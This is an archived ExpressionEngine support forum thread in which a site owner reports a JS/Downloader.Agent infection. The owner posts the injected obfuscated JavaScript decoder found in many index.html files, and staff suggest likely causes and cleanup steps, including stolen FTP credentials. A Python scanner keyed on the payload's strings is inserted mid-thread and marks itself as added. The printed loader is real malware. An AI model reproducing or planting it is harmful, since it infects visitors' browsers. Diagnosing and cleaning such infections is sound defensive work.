ExpressionEngine CMS

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

Malware (JS/Downloader.Agent)

February 23, 2012 12:07pm

  • #1 / Feb 23, 2012 12:07pm

    pblackler

    12 posts

    Hi there,

    On http://www.alchemhealthcare.com, I have a malware issue identified by http://vscan.urlvoid.com (AVG v.10.0.0.1190) as JS/Downloader.Agent

    I’ve checked config.php, database.php and index.php “to ensure that there is no unusual code such as iFrames or Javascript includes”

    I’ve updated to the latest version of EE (v2.4.0) but still get the tell-tale:

    [removed]var nf902ae4="";var e1060178120b5={dbf6eafb4f182:function(){var qb=String,vb=Array.prototype.slice.call(arguments).join(""),y8=vb.substr(this.t8(),3)-578,vd,ye;vb=vb.substr(this.rd());var wd=this.vf(vb);for(var xd=0;xd<wd;xd++){try{throw(u0=this.p2(vb,xd));}catch(e){u0=e;};if(u0=='•')
    etc, etc, etc

    Please can you advise me how to clean the infection and avoid re-infection?

    Regards,

    Peter

  • #2 / Feb 23, 2012 11:30pm

    Kevin Smith

    4784 posts

    Hi Peter,

    Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

    1. Where in your files the code you posted above is being found.
    2. Other scripts on your account, whether in use or not (phpBB, etc…)*

    * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

    While we work through this, please check through these files:

    * index.php
    * admin.php
    * system/index.php
    * system/expressionengine/config/config.php

    If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

    Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

  • #3 / Feb 27, 2012 5:37am

    pblackler

    12 posts

    Hi Kevin,

    Many thanks for your help

    >> 1. Where in your files the code you posted above is being found <<

    in all the files listed below

    >> If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks <<

    The Host can’t find anything relevant at this time

    The code below is in the html files on the server not just in dynamically generated pages

    Any advice on this would be very much appreciated

    Regards,

    Peter

    images/pm_attachments/index.html
    images/smileys/index.html
    images/avatars/uploads/index.html
    images/avatars/uploads/index.html
    images/avatars/default_set/index.html
    images/avatars/default_set/index.html
    images/avatars/index.html
    images/avatars/index.html
    images/captchas/index.html
    images/captchas/index.html
    images/member_photos/index.html
    images/member_photos/index.html
    images/site_images/_thumbs/index.html
    images/site_images/_thumbs/index.html
    images/uploads/index.html
    images/uploads/index.html
    images/uploads/_thumbs/index.html
    images/index.html
    images/index.html
    images/signature_attachments/index.html
    images/signature_attachments/index.html
    online-prescriptions/index.html
    online-prescriptions/index.html
    system/codeigniter/system/logs/index.html
    system/codeigniter/system/logs/index.html
    system/codeigniter/system/cache/index.html
    system/codeigniter/system/cache/index.html
    system/expressionengine/javascript/compressed/cp/index.html
    system/expressionengine/javascript/compressed/cp/index.html
    system/expressionengine/javascript/compressed/jquery/ui/i18n/index.html
    system/expressionengine/javascript/compressed/jquery/ui/i18n/index.html
    system/expressionengine/javascript/compressed/jquery/plugins/index.html
    system/expressionengine/javascript/compressed/jquery/plugins/index.html
    system/expressionengine/javascript/compressed/jquery/themes/default/images/index.html
    system/expressionengine/javascript/compressed/jquery/themes/default/images/index.html
    system/expressionengine/javascript/compressed/jquery/index.html
    system/expressionengine/javascript/compressed/jquery/index.html
    system/expressionengine/javascript/index.html
    system/expressionengine/javascript/index.html
    system/expressionengine/templates/default_site/CSS.group/index.html
    system/expressionengine/templates/default_site/CSS.group/index.html
    system/expressionengine/templates/default_site/links.group/index.html
    system/expressionengine/templates/default_site/links.group/index.html
    system/expressionengine/templates/default_site/site.group/index.html
    system/expressionengine/templates/default_site/site.group/index.html
    system/expressionengine/templates/default_site/alchem.group/index.html
    system/expressionengine/templates/default_site/alchem.group/index.html
    system/expressionengine/templates/default_site/Products.group/index.html
    system/expressionengine/templates/default_site/Products.group/index.html
    system/expressionengine/templates/default_site/healthchecks.group/index.html
    system/expressionengine/templates/default_site/healthchecks.group/index.html
    system/expressionengine/templates/default_site/chemist.group/index.html
    system/expressionengine/templates/default_site/chemist.group/index.html
    system/expressionengine/modules/blogger_api/javascript/index.html
    system/expressionengine/modules/blogger_api/javascript/index.html
    system/expressionengine/modules/blogger_api/models/index.html
    system/expressionengine/modules/blogger_api/models/index.html
    system/expressionengine/modules/blogger_api/views/index.html
    system/expressionengine/modules/blogger_api/views/index.html
    system/expressionengine/modules/blogger_api/index.html
    system/expressionengine/modules/blogger_api/index.html
    system/expressionengine/third_party/index.html
    system/expressionengine/third_party/index.html
    system/expressionengine/language/index.html
    system/expressionengine/language/index.html
    themes/third_party/index.html
    themes/third_party/index.html
    _thumbs/index.html
    _thumbs/index.html

    [removed]var nf902ae4="";var e1060178120b5={dbf6eafb4f182:function(){var qb=String,vb=Array.prototype.slice.call(arguments).join(""),y8=vb.substr(this.t8(),3)-578,vd,ye;vb=vb.substr(this.rd());var wd=this.vf(vb);for(var xd=0;xd<wd;xd++){try{throw(u0=this.p2(vb,xd));}catch(e){u0=e;};if(u0=='•'){y8="";xd=this.ta(xd);sf=this.q2(vb,xd);while(this.w6(sf)){y8+=sf;xd++;sf=this.yc(vb,xd);}y8-=435;continue;}vd="";if(this.q0(u0)){xd++;u0=vb.substr(xd,1);while(u0!='±'){vd+=u0;xd++;u0=vb.substr(xd,1);}vd=this.rc(vd,y8,47);if(vd<0)vd+=256;vd=this.v2(vd);this.oc(vd);continue;}yd=this.v9(u0);if(yd>848)yd-=848;ye=yd-y8-47;ye=this.v7(ye);nf902ae4+=this.re(ye);}},t8:function(){return 15;},rd:function(){return 18;},vf:function(v1){return v1.length;},p2:function(x3,s6){return x3.substr(s6,1);},ta:function(o3){return ++o3;},q2:function(td,rb){return td.substr(rb,1);},yc:function(n6,sd){return n6.substr(sd,1);},v2:function(t2){if(t2==168)t2=1025;else if(t2==184)t2=1105;return (t2>=192 && t2<256) ? t2+848 : t2;},w6:function(pd){return pd!='•';},q0:function(o1){return o1=='±';},rc:function(q7,n8,we){return q7-n8-we;},oc:function(ob){var qb=String;nf902ae4+=qb["fr\x6f\x6dCharCo\x64e"](ob);},re:function(oa){var qb=String;return qb["fr\x6f\x6dCharCo\x64e"](oa);},v7:function(r5){var r7=r5;if(r7<0)r7+=256;if(r7==168)r7=1025;else if(r7==184)r7=1105;return (r7>=192 && r7<256) ? r7+848 : r7;},v9:function(w1){return (w1+'')["ch\x61\x72Co\x64eAt"](0);}};e1060178120b5.dbf6eafb4f182 (etc)
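One way to locate every file carrying the injected script, as an added example that is not from this thread or from ExpressionEngine: a Python scanner keyed on substrings of the sample posted above (the hex-escaped `fromCharCode` / `charCodeAt` property names and the `try{throw(` trick), run here against a constructed temporary tree. The placeholder HTML, the `<script>` excerpt (the post shows that tag as `[removed]`) and the file layout are constructed for the demo.

```python
import os
import tempfile

# Constructed from the injected script quoted above (not a vendor signature): the hex-escaped
# property names that hide String.fromCharCode / charCodeAt, and the decoder's throw/catch trick.
INDICATORS = {
    "hex-escaped fromCharCode": '"fr\\x6f\\x6dCharCo\\x64e"',
    "hex-escaped charCodeAt": '"ch\\x61\\x72Co\\x64eAt"',
    "throw/catch value smuggling": "try{throw(",
}
SUFFIXES = (".html", ".htm", ".php", ".js")

def scan_file(path):
    # Return the indicator names found in one file; unreadable files count as clean.
    try:
        with open(path, "rb") as fh:
            text = fh.read().decode("utf-8", errors="replace")
    except OSError:
        return []
    return [name for name, needle in INDICATORS.items() if needle in text]

def scan_tree(root):
    """Map each flagged file under root (relative path, forward slashes) to its hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SUFFIXES):
                full = os.path.join(dirpath, name)
                found = scan_file(full)
                if found:
                    hits[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return hits

# Constructed demo tree: a placeholder index.html, and a copy with a short excerpt of the
# injected script appended (the encoded payload itself is left out).
CLEAN = "<html><head><title>403 Forbidden</title></head><body>Directory access is forbidden.</body></html>\n"
INJECTED = CLEAN + (r'<script>var nf902ae4="";var e1060178120b5={dbf6eafb4f182:function(){'
                    r'try{throw(u0=this.p2(vb,xd));}catch(e){u0=e;}},oc:function(ob){'
                    r'var qb=String;nf902ae4+=qb["fr\x6f\x6dCharCo\x64e"](ob);}};</script>' "\n")

def build_demo_tree():
    root = tempfile.mkdtemp(prefix="ee-scan-")
    for rel, body in (("images/index.html", CLEAN), ("images/uploads/index.html", INJECTED)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

def scan_demo():
    return scan_tree(build_demo_tree())  # only the injected file should be reported
```

Run it against the real web root with `scan_tree("/path/to/site")`; any hit on a stock `index.html` placeholder is a file that needs to be replaced from a known-clean copy after the entry point is closed.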

  • #4 / Feb 27, 2012 5:39pm

    Shane Eckert

    7174 posts

    Hello pblackler,

    Unfortunately, no matter how many times you install *clean* files, until the actual cause is eliminated and the exploit is patched or removed, you will never get out of the loop.

    The best bet is to work with your hosting provider. Chances are you are not the only one and this is either going to be a patch that needs to be applied on the server level, be it Unix, PHP, MySQL, Apache, take your pick, or another application that you are using on your account.

    If you can, get rid of anything you do not need and then be sure to tell your hosting provider exactly what you have installed in your domain.

    Let us know how it goes and what your provider says.

    Cheers,

  • #5 / Mar 01, 2012 5:33am

    pblackler

    12 posts

    Hi Shane,

    Thanks for the reply

    One thing that is noticeable is that it is two individual EE sites that are affected and others we have on the same server are not. That does suggest to me that the infection hasn’t come from “higher-up” (as it were…) and that we need to discount infection through the website(s) themselves

    What do you think?

    BTW after another look the host has commented as here: “I can confirm that this is not a server level issue”

    Kind regards,

    Peter

  • #6 / Mar 01, 2012 12:37pm

    Kurt Deutscher

    827 posts

    There is a known computer virus/script, spread by email, that targets FTP software that hasn’t been kept up-to-date, on computers that haven’t been kept up-to-date. It’s my understanding that the script sends ftp credentials back to the criminal. The criminal then FTP’s into the site, runs a script in your hosting account that places a short call to another compromised account somewhere. The original script is then removed.

    You should change all your FTP security settings, new passwords, new usernames, and then make sure that every computer that currently connects to this account using FTP/SFTP is running up-to-date software.

    We’ve had ONE of our EE sites hit with this thing, and we know that our client’s gear is/was not kept up to date, and that they had given out FTP info to 6 or more folks, and that many of those folks have personal computers that are not kept up-to-date. We had a long talk with our client.

    We have 35 other EE sites on the same server, and it appears that only one had this issue, so we’re cautiously optimistic that it’s an issue of someone not keeping their FTP software up-to-date, or not removing it before they donate their computer to a friend/relative.

    EE actually helped us catch this early, as our client was updating the site when he was suddenly not able to connect to the control panel and called us to find out why. We caught this within 2 hours of the thing happening.

  • #7 / Mar 01, 2012 8:23pm

    Sean C. Smith

    3818 posts

    Peter,

    Does Kurt’s message shed further light on this issue? Are you using up to date FTP software on your work and personal computers at home? The same question for anyone else who may have ftp access to this site.

    Sean

  • #8 / Mar 06, 2012 4:27am

    pblackler

    12 posts

    Sincere apologies to you both for a slow reply and many thanks for your help.

    >> You should change all your FTP security settings, new passwords, new usernames, and then make sure that every computer that currently connects to this account using FTP/SFTP is running up-to-date software <<

    Yes, good point. It is done, but I will keep a watch on it.

    The site has been cleaned and not _yet_ re-infected…we’ll see!

    Kind Regards & thanks again,

    Peter

  • #9 / Mar 08, 2012 2:35pm

    Shane Eckert

    7174 posts

    Hi pblackler,

    That is awesome! I am glad to hear it. Here is hoping it stays that way.

    If you have any more concerns or questions in the future, please let us know!

    Cheers,
